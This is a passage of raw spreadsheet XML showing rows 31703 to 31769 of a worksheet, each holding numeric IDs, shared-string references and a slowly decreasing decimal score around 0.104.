      </c>
    </row>
    <row r="31703" ht="15.75" customHeight="1">
      <c r="A31703" s="1">
        <v>15022.0</v>
      </c>
      <c r="B31703" s="2">
        <v>4.1542401E7</v>
      </c>
      <c r="C31703" s="2" t="s">
        <v>30491</v>
      </c>
      <c r="D31703" s="2">
        <v>1.0</v>
      </c>
      <c r="E31703" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31703" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31704" ht="15.75" customHeight="1">
      <c r="A31704" s="1">
        <v>18554.0</v>
      </c>
      <c r="B31704" s="2">
        <v>5.3160259E7</v>
      </c>
      <c r="C31704" s="2" t="s">
        <v>30492</v>
      </c>
      <c r="D31704" s="2">
        <v>1.0</v>
      </c>
      <c r="E31704" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31704" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31705" ht="15.75" customHeight="1">
      <c r="A31705" s="1">
        <v>18773.0</v>
      </c>
      <c r="B31705" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C31705" s="2" t="s">
        <v>30493</v>
      </c>
      <c r="D31705" s="2">
        <v>1.0</v>
      </c>
      <c r="E31705" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31705" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31706" ht="15.75" customHeight="1">
      <c r="A31706" s="1">
        <v>18935.0</v>
      </c>
      <c r="B31706" s="2">
        <v>5.4280762E7</v>
      </c>
      <c r="C31706" s="2" t="s">
        <v>30494</v>
      </c>
      <c r="D31706" s="2">
        <v>1.0</v>
      </c>
      <c r="E31706" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31706" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31707" ht="15.75" customHeight="1">
      <c r="A31707" s="1">
        <v>19665.0</v>
      </c>
      <c r="B31707" s="2">
        <v>5.6368742E7</v>
      </c>
      <c r="C31707" s="2" t="s">
        <v>30495</v>
      </c>
      <c r="D31707" s="2">
        <v>1.0</v>
      </c>
      <c r="E31707" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31707" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31708" ht="15.75" customHeight="1">
      <c r="A31708" s="1">
        <v>19787.0</v>
      </c>
      <c r="B31708" s="2">
        <v>5.6808023E7</v>
      </c>
      <c r="C31708" s="2" t="s">
        <v>30496</v>
      </c>
      <c r="D31708" s="2">
        <v>1.0</v>
      </c>
      <c r="E31708" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31708" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31709" ht="15.75" customHeight="1">
      <c r="A31709" s="1">
        <v>22086.0</v>
      </c>
      <c r="B31709" s="2">
        <v>3.0754633E7</v>
      </c>
      <c r="C31709" s="2" t="s">
        <v>30497</v>
      </c>
      <c r="D31709" s="2">
        <v>1.0</v>
      </c>
      <c r="E31709" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31709" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31710" ht="15.75" customHeight="1">
      <c r="A31710" s="1">
        <v>22722.0</v>
      </c>
      <c r="B31710" s="2">
        <v>4.3577329E7</v>
      </c>
      <c r="C31710" s="2" t="s">
        <v>30498</v>
      </c>
      <c r="D31710" s="2">
        <v>1.0</v>
      </c>
      <c r="E31710" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31710" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31711" ht="15.75" customHeight="1">
      <c r="A31711" s="1">
        <v>23632.0</v>
      </c>
      <c r="B31711" s="2">
        <v>6590424.0</v>
      </c>
      <c r="C31711" s="2" t="s">
        <v>30499</v>
      </c>
      <c r="D31711" s="2">
        <v>1.0</v>
      </c>
      <c r="E31711" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31711" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31712" ht="15.75" customHeight="1">
      <c r="A31712" s="1">
        <v>25264.0</v>
      </c>
      <c r="B31712" s="2">
        <v>1.3389346E7</v>
      </c>
      <c r="C31712" s="2" t="s">
        <v>30500</v>
      </c>
      <c r="D31712" s="2">
        <v>1.0</v>
      </c>
      <c r="E31712" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31712" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31713" ht="15.75" customHeight="1">
      <c r="A31713" s="1">
        <v>25938.0</v>
      </c>
      <c r="B31713" s="2">
        <v>1.5230907E7</v>
      </c>
      <c r="C31713" s="2" t="s">
        <v>30501</v>
      </c>
      <c r="D31713" s="2">
        <v>1.0</v>
      </c>
      <c r="E31713" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31713" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31714" ht="15.75" customHeight="1">
      <c r="A31714" s="1">
        <v>26125.0</v>
      </c>
      <c r="B31714" s="2">
        <v>1.5914071E7</v>
      </c>
      <c r="C31714" s="2" t="s">
        <v>30502</v>
      </c>
      <c r="D31714" s="2">
        <v>1.0</v>
      </c>
      <c r="E31714" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31714" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31715" ht="15.75" customHeight="1">
      <c r="A31715" s="1">
        <v>26463.0</v>
      </c>
      <c r="B31715" s="2">
        <v>1.7328184E7</v>
      </c>
      <c r="C31715" s="2" t="s">
        <v>30503</v>
      </c>
      <c r="D31715" s="2">
        <v>1.0</v>
      </c>
      <c r="E31715" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31715" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31716" ht="15.75" customHeight="1">
      <c r="A31716" s="1">
        <v>27182.0</v>
      </c>
      <c r="B31716" s="2">
        <v>2.0873122E7</v>
      </c>
      <c r="C31716" s="2" t="s">
        <v>30504</v>
      </c>
      <c r="D31716" s="2">
        <v>1.0</v>
      </c>
      <c r="E31716" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31716" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31717" ht="15.75" customHeight="1">
      <c r="A31717" s="1">
        <v>27282.0</v>
      </c>
      <c r="B31717" s="2">
        <v>2.1235861E7</v>
      </c>
      <c r="C31717" s="2" t="s">
        <v>30505</v>
      </c>
      <c r="D31717" s="2">
        <v>1.0</v>
      </c>
      <c r="E31717" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31717" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31718" ht="15.75" customHeight="1">
      <c r="A31718" s="1">
        <v>27331.0</v>
      </c>
      <c r="B31718" s="2">
        <v>2.1449412E7</v>
      </c>
      <c r="C31718" s="2" t="s">
        <v>30506</v>
      </c>
      <c r="D31718" s="2">
        <v>1.0</v>
      </c>
      <c r="E31718" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31718" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31719" ht="15.75" customHeight="1">
      <c r="A31719" s="1">
        <v>27641.0</v>
      </c>
      <c r="B31719" s="2">
        <v>2.2751795E7</v>
      </c>
      <c r="C31719" s="2" t="s">
        <v>30507</v>
      </c>
      <c r="D31719" s="2">
        <v>1.0</v>
      </c>
      <c r="E31719" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31719" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31720" ht="15.75" customHeight="1">
      <c r="A31720" s="1">
        <v>28337.0</v>
      </c>
      <c r="B31720" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C31720" s="2" t="s">
        <v>30508</v>
      </c>
      <c r="D31720" s="2">
        <v>1.0</v>
      </c>
      <c r="E31720" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31720" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31721" ht="15.75" customHeight="1">
      <c r="A31721" s="1">
        <v>29137.0</v>
      </c>
      <c r="B31721" s="2">
        <v>3.0543941E7</v>
      </c>
      <c r="C31721" s="2" t="s">
        <v>30509</v>
      </c>
      <c r="D31721" s="2">
        <v>1.0</v>
      </c>
      <c r="E31721" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31721" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31722" ht="15.75" customHeight="1">
      <c r="A31722" s="1">
        <v>29158.0</v>
      </c>
      <c r="B31722" s="2">
        <v>3.0618919E7</v>
      </c>
      <c r="C31722" s="2" t="s">
        <v>30510</v>
      </c>
      <c r="D31722" s="2">
        <v>1.0</v>
      </c>
      <c r="E31722" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31722" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31723" ht="15.75" customHeight="1">
      <c r="A31723" s="1">
        <v>29815.0</v>
      </c>
      <c r="B31723" s="2">
        <v>3.5202925E7</v>
      </c>
      <c r="C31723" s="2" t="s">
        <v>30511</v>
      </c>
      <c r="D31723" s="2">
        <v>1.0</v>
      </c>
      <c r="E31723" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31723" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31724" ht="15.75" customHeight="1">
      <c r="A31724" s="1">
        <v>30253.0</v>
      </c>
      <c r="B31724" s="2">
        <v>3.7580709E7</v>
      </c>
      <c r="C31724" s="2" t="s">
        <v>30512</v>
      </c>
      <c r="D31724" s="2">
        <v>1.0</v>
      </c>
      <c r="E31724" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31724" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31725" ht="15.75" customHeight="1">
      <c r="A31725" s="1">
        <v>30752.0</v>
      </c>
      <c r="B31725" s="2">
        <v>4.4173153E7</v>
      </c>
      <c r="C31725" s="2" t="s">
        <v>30513</v>
      </c>
      <c r="D31725" s="2">
        <v>1.0</v>
      </c>
      <c r="E31725" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31725" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31726" ht="15.75" customHeight="1">
      <c r="A31726" s="1">
        <v>31879.0</v>
      </c>
      <c r="B31726" s="2">
        <v>5.2866709E7</v>
      </c>
      <c r="C31726" s="2" t="s">
        <v>30514</v>
      </c>
      <c r="D31726" s="2">
        <v>1.0</v>
      </c>
      <c r="E31726" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31726" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31727" ht="15.75" customHeight="1">
      <c r="A31727" s="1">
        <v>32991.0</v>
      </c>
      <c r="B31727" s="2">
        <v>6606956.0</v>
      </c>
      <c r="C31727" s="2" t="s">
        <v>30515</v>
      </c>
      <c r="D31727" s="2">
        <v>1.0</v>
      </c>
      <c r="E31727" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31727" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31728" ht="15.75" customHeight="1">
      <c r="A31728" s="1">
        <v>33431.0</v>
      </c>
      <c r="B31728" s="2">
        <v>7804876.0</v>
      </c>
      <c r="C31728" s="2" t="s">
        <v>30516</v>
      </c>
      <c r="D31728" s="2">
        <v>1.0</v>
      </c>
      <c r="E31728" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31728" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="31729" ht="15.75" customHeight="1">
      <c r="A31729" s="1">
        <v>25112.0</v>
      </c>
      <c r="B31729" s="2">
        <v>1.2965503E7</v>
      </c>
      <c r="C31729" s="2" t="s">
        <v>30517</v>
      </c>
      <c r="D31729" s="2">
        <v>1.0</v>
      </c>
      <c r="E31729" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31729" s="2">
        <v>0.1044061302681993</v>
      </c>
    </row>
    <row r="31730" ht="15.75" customHeight="1">
      <c r="A31730" s="1">
        <v>642.0</v>
      </c>
      <c r="B31730" s="2">
        <v>1.9867618E7</v>
      </c>
      <c r="C31730" s="2" t="s">
        <v>30518</v>
      </c>
      <c r="D31730" s="2">
        <v>1.0</v>
      </c>
      <c r="E31730" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31730" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="31731" ht="15.75" customHeight="1">
      <c r="A31731" s="1">
        <v>3310.0</v>
      </c>
      <c r="B31731" s="2">
        <v>3.7599106E7</v>
      </c>
      <c r="C31731" s="2" t="s">
        <v>30519</v>
      </c>
      <c r="D31731" s="2">
        <v>1.0</v>
      </c>
      <c r="E31731" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31731" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="31732" ht="15.75" customHeight="1">
      <c r="A31732" s="1">
        <v>11877.0</v>
      </c>
      <c r="B31732" s="2">
        <v>2.5014975E7</v>
      </c>
      <c r="C31732" s="2" t="s">
        <v>30520</v>
      </c>
      <c r="D31732" s="2">
        <v>1.0</v>
      </c>
      <c r="E31732" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31732" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="31733" ht="15.75" customHeight="1">
      <c r="A31733" s="1">
        <v>20506.0</v>
      </c>
      <c r="B31733" s="2">
        <v>1.2965504E7</v>
      </c>
      <c r="C31733" s="2" t="s">
        <v>30517</v>
      </c>
      <c r="D31733" s="2">
        <v>1.0</v>
      </c>
      <c r="E31733" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31733" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="31734" ht="15.75" customHeight="1">
      <c r="A31734" s="1">
        <v>28668.0</v>
      </c>
      <c r="B31734" s="2">
        <v>2.7489658E7</v>
      </c>
      <c r="C31734" s="2" t="s">
        <v>30521</v>
      </c>
      <c r="D31734" s="2">
        <v>1.0</v>
      </c>
      <c r="E31734" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31734" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="31735" ht="15.75" customHeight="1">
      <c r="A31735" s="1">
        <v>29654.0</v>
      </c>
      <c r="B31735" s="2">
        <v>3.3874679E7</v>
      </c>
      <c r="C31735" s="2" t="s">
        <v>30522</v>
      </c>
      <c r="D31735" s="2">
        <v>1.0</v>
      </c>
      <c r="E31735" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31735" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="31736" ht="15.75" customHeight="1">
      <c r="A31736" s="1">
        <v>34247.0</v>
      </c>
      <c r="B31736" s="2">
        <v>4.924416E7</v>
      </c>
      <c r="C31736" s="2" t="s">
        <v>30523</v>
      </c>
      <c r="D31736" s="2">
        <v>1.0</v>
      </c>
      <c r="E31736" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31736" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="31737" ht="15.75" customHeight="1">
      <c r="A31737" s="1">
        <v>6935.0</v>
      </c>
      <c r="B31737" s="2">
        <v>4.9898062E7</v>
      </c>
      <c r="C31737" s="2" t="s">
        <v>30524</v>
      </c>
      <c r="D31737" s="2">
        <v>1.0</v>
      </c>
      <c r="E31737" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31737" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="31738" ht="15.75" customHeight="1">
      <c r="A31738" s="1">
        <v>22801.0</v>
      </c>
      <c r="B31738" s="2">
        <v>4.5716328E7</v>
      </c>
      <c r="C31738" s="2" t="s">
        <v>30525</v>
      </c>
      <c r="D31738" s="2">
        <v>1.0</v>
      </c>
      <c r="E31738" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31738" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="31739" ht="15.75" customHeight="1">
      <c r="A31739" s="1">
        <v>28229.0</v>
      </c>
      <c r="B31739" s="2">
        <v>2.5138326E7</v>
      </c>
      <c r="C31739" s="2" t="s">
        <v>30526</v>
      </c>
      <c r="D31739" s="2">
        <v>1.0</v>
      </c>
      <c r="E31739" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31739" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="31740" ht="15.75" customHeight="1">
      <c r="A31740" s="1">
        <v>29335.0</v>
      </c>
      <c r="B31740" s="2">
        <v>3.1333074E7</v>
      </c>
      <c r="C31740" s="2" t="s">
        <v>30527</v>
      </c>
      <c r="D31740" s="2">
        <v>1.0</v>
      </c>
      <c r="E31740" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31740" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="31741" ht="15.75" customHeight="1">
      <c r="A31741" s="1">
        <v>31271.0</v>
      </c>
      <c r="B31741" s="2">
        <v>4944313.0</v>
      </c>
      <c r="C31741" s="2" t="s">
        <v>30528</v>
      </c>
      <c r="D31741" s="2">
        <v>1.0</v>
      </c>
      <c r="E31741" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31741" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="31742" ht="15.75" customHeight="1">
      <c r="A31742" s="1">
        <v>2329.0</v>
      </c>
      <c r="B31742" s="2">
        <v>3.2936022E7</v>
      </c>
      <c r="C31742" s="2" t="s">
        <v>30529</v>
      </c>
      <c r="D31742" s="2">
        <v>1.0</v>
      </c>
      <c r="E31742" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31742" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31743" ht="15.75" customHeight="1">
      <c r="A31743" s="1">
        <v>3643.0</v>
      </c>
      <c r="B31743" s="2">
        <v>3.9283139E7</v>
      </c>
      <c r="C31743" s="2" t="s">
        <v>30530</v>
      </c>
      <c r="D31743" s="2">
        <v>1.0</v>
      </c>
      <c r="E31743" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31743" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31744" ht="15.75" customHeight="1">
      <c r="A31744" s="1">
        <v>4699.0</v>
      </c>
      <c r="B31744" s="2">
        <v>4.3244491E7</v>
      </c>
      <c r="C31744" s="2" t="s">
        <v>30531</v>
      </c>
      <c r="D31744" s="2">
        <v>1.0</v>
      </c>
      <c r="E31744" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31744" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31745" ht="15.75" customHeight="1">
      <c r="A31745" s="1">
        <v>6078.0</v>
      </c>
      <c r="B31745" s="2">
        <v>4.766017E7</v>
      </c>
      <c r="C31745" s="2" t="s">
        <v>30532</v>
      </c>
      <c r="D31745" s="2">
        <v>1.0</v>
      </c>
      <c r="E31745" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31745" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31746" ht="15.75" customHeight="1">
      <c r="A31746" s="1">
        <v>6539.0</v>
      </c>
      <c r="B31746" s="2">
        <v>4.8853333E7</v>
      </c>
      <c r="C31746" s="2" t="s">
        <v>30533</v>
      </c>
      <c r="D31746" s="2">
        <v>1.0</v>
      </c>
      <c r="E31746" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31746" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31747" ht="15.75" customHeight="1">
      <c r="A31747" s="1">
        <v>8009.0</v>
      </c>
      <c r="B31747" s="2">
        <v>5.2786827E7</v>
      </c>
      <c r="C31747" s="2" t="s">
        <v>30534</v>
      </c>
      <c r="D31747" s="2">
        <v>1.0</v>
      </c>
      <c r="E31747" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31747" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31748" ht="15.75" customHeight="1">
      <c r="A31748" s="1">
        <v>12535.0</v>
      </c>
      <c r="B31748" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C31748" s="2" t="s">
        <v>30535</v>
      </c>
      <c r="D31748" s="2">
        <v>1.0</v>
      </c>
      <c r="E31748" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31748" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31749" ht="15.75" customHeight="1">
      <c r="A31749" s="1">
        <v>13382.0</v>
      </c>
      <c r="B31749" s="2">
        <v>3.4885639E7</v>
      </c>
      <c r="C31749" s="2" t="s">
        <v>30536</v>
      </c>
      <c r="D31749" s="2">
        <v>1.0</v>
      </c>
      <c r="E31749" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31749" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31750" ht="15.75" customHeight="1">
      <c r="A31750" s="1">
        <v>13766.0</v>
      </c>
      <c r="B31750" s="2">
        <v>3.6518503E7</v>
      </c>
      <c r="C31750" s="2" t="s">
        <v>30537</v>
      </c>
      <c r="D31750" s="2">
        <v>1.0</v>
      </c>
      <c r="E31750" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31750" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31751" ht="15.75" customHeight="1">
      <c r="A31751" s="1">
        <v>30413.0</v>
      </c>
      <c r="B31751" s="2">
        <v>3.8799969E7</v>
      </c>
      <c r="C31751" s="2" t="s">
        <v>30538</v>
      </c>
      <c r="D31751" s="2">
        <v>1.0</v>
      </c>
      <c r="E31751" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31751" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="31752" ht="15.75" customHeight="1">
      <c r="A31752" s="1">
        <v>3105.0</v>
      </c>
      <c r="B31752" s="2">
        <v>3.6728687E7</v>
      </c>
      <c r="C31752" s="2" t="s">
        <v>30539</v>
      </c>
      <c r="D31752" s="2">
        <v>1.0</v>
      </c>
      <c r="E31752" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31752" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31753" ht="15.75" customHeight="1">
      <c r="A31753" s="1">
        <v>7063.0</v>
      </c>
      <c r="B31753" s="2">
        <v>5.0233089E7</v>
      </c>
      <c r="C31753" s="2" t="s">
        <v>30540</v>
      </c>
      <c r="D31753" s="2">
        <v>1.0</v>
      </c>
      <c r="E31753" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31753" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31754" ht="15.75" customHeight="1">
      <c r="A31754" s="1">
        <v>9478.0</v>
      </c>
      <c r="B31754" s="2">
        <v>5.5876016E7</v>
      </c>
      <c r="C31754" s="2" t="s">
        <v>30541</v>
      </c>
      <c r="D31754" s="2">
        <v>1.0</v>
      </c>
      <c r="E31754" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31754" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31755" ht="15.75" customHeight="1">
      <c r="A31755" s="1">
        <v>10293.0</v>
      </c>
      <c r="B31755" s="2">
        <v>5.7647027E7</v>
      </c>
      <c r="C31755" s="2" t="s">
        <v>30542</v>
      </c>
      <c r="D31755" s="2">
        <v>1.0</v>
      </c>
      <c r="E31755" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31755" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31756" ht="15.75" customHeight="1">
      <c r="A31756" s="1">
        <v>13104.0</v>
      </c>
      <c r="B31756" s="2">
        <v>3.3532359E7</v>
      </c>
      <c r="C31756" s="2" t="s">
        <v>30543</v>
      </c>
      <c r="D31756" s="2">
        <v>1.0</v>
      </c>
      <c r="E31756" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31756" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31757" ht="15.75" customHeight="1">
      <c r="A31757" s="1">
        <v>18504.0</v>
      </c>
      <c r="B31757" s="2">
        <v>5.2950146E7</v>
      </c>
      <c r="C31757" s="2" t="s">
        <v>30544</v>
      </c>
      <c r="D31757" s="2">
        <v>1.0</v>
      </c>
      <c r="E31757" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31757" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31758" ht="15.75" customHeight="1">
      <c r="A31758" s="1">
        <v>19086.0</v>
      </c>
      <c r="B31758" s="2">
        <v>5.4657252E7</v>
      </c>
      <c r="C31758" s="2" t="s">
        <v>30545</v>
      </c>
      <c r="D31758" s="2">
        <v>1.0</v>
      </c>
      <c r="E31758" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31758" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31759" ht="15.75" customHeight="1">
      <c r="A31759" s="1">
        <v>19458.0</v>
      </c>
      <c r="B31759" s="2">
        <v>5.5754566E7</v>
      </c>
      <c r="C31759" s="2" t="s">
        <v>30546</v>
      </c>
      <c r="D31759" s="2">
        <v>1.0</v>
      </c>
      <c r="E31759" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31759" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31760" ht="15.75" customHeight="1">
      <c r="A31760" s="1">
        <v>25168.0</v>
      </c>
      <c r="B31760" s="2">
        <v>1.3095051E7</v>
      </c>
      <c r="C31760" s="2" t="s">
        <v>30547</v>
      </c>
      <c r="D31760" s="2">
        <v>1.0</v>
      </c>
      <c r="E31760" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31760" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31761" ht="15.75" customHeight="1">
      <c r="A31761" s="1">
        <v>33242.0</v>
      </c>
      <c r="B31761" s="2">
        <v>7303601.0</v>
      </c>
      <c r="C31761" s="2" t="s">
        <v>30548</v>
      </c>
      <c r="D31761" s="2">
        <v>1.0</v>
      </c>
      <c r="E31761" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31761" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="31762" ht="15.75" customHeight="1">
      <c r="A31762" s="1">
        <v>1262.0</v>
      </c>
      <c r="B31762" s="2">
        <v>2.5213212E7</v>
      </c>
      <c r="C31762" s="2" t="s">
        <v>30549</v>
      </c>
      <c r="D31762" s="2">
        <v>1.0</v>
      </c>
      <c r="E31762" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31762" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="31763" ht="15.75" customHeight="1">
      <c r="A31763" s="1">
        <v>1569.0</v>
      </c>
      <c r="B31763" s="2">
        <v>2.7658953E7</v>
      </c>
      <c r="C31763" s="2" t="s">
        <v>30550</v>
      </c>
      <c r="D31763" s="2">
        <v>1.0</v>
      </c>
      <c r="E31763" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31763" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="31764" ht="15.75" customHeight="1">
      <c r="A31764" s="1">
        <v>3935.0</v>
      </c>
      <c r="B31764" s="2">
        <v>4.0595627E7</v>
      </c>
      <c r="C31764" s="2" t="s">
        <v>30551</v>
      </c>
      <c r="D31764" s="2">
        <v>1.0</v>
      </c>
      <c r="E31764" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31764" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="31765" ht="15.75" customHeight="1">
      <c r="A31765" s="1">
        <v>10071.0</v>
      </c>
      <c r="B31765" s="2">
        <v>5.7142626E7</v>
      </c>
      <c r="C31765" s="2" t="s">
        <v>30552</v>
      </c>
      <c r="D31765" s="2">
        <v>1.0</v>
      </c>
      <c r="E31765" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31765" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="31766" ht="15.75" customHeight="1">
      <c r="A31766" s="1">
        <v>13659.0</v>
      </c>
      <c r="B31766" s="2">
        <v>3.5976258E7</v>
      </c>
      <c r="C31766" s="2" t="s">
        <v>30553</v>
      </c>
      <c r="D31766" s="2">
        <v>1.0</v>
      </c>
      <c r="E31766" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31766" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="31767" ht="15.75" customHeight="1">
      <c r="A31767" s="1">
        <v>15417.0</v>
      </c>
      <c r="B31767" s="2">
        <v>4.288142E7</v>
      </c>
      <c r="C31767" s="2" t="s">
        <v>30554</v>
      </c>
      <c r="D31767" s="2">
        <v>1.0</v>
      </c>
      <c r="E31767" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31767" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="31768" ht="15.75" customHeight="1">
      <c r="A31768" s="1">
        <v>20102.0</v>
      </c>
      <c r="B31768" s="2">
        <v>9769198.0</v>
      </c>
      <c r="C31768" s="2" t="s">
        <v>30555</v>
      </c>
      <c r="D31768" s="2">
        <v>1.0</v>
      </c>
      <c r="E31768" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31768" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="31769" ht="15.75" customHeight="1">
      <c r="A31769" s="1">
        <v>2410.0</v>
      </c>
      <c r="B31769" s="2">
        <v>3.3479912E7</v>
      </c>
      <c r="C31769" s="2" t="s">
        <v>30556</v>
      </c>
      <c r="D31769" s="2">
        <v>1.0</v>
      </c>
      <c r="E31769" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31769" s="2">
        <v>0.1031746031746032</v>
      </c>
    </row>
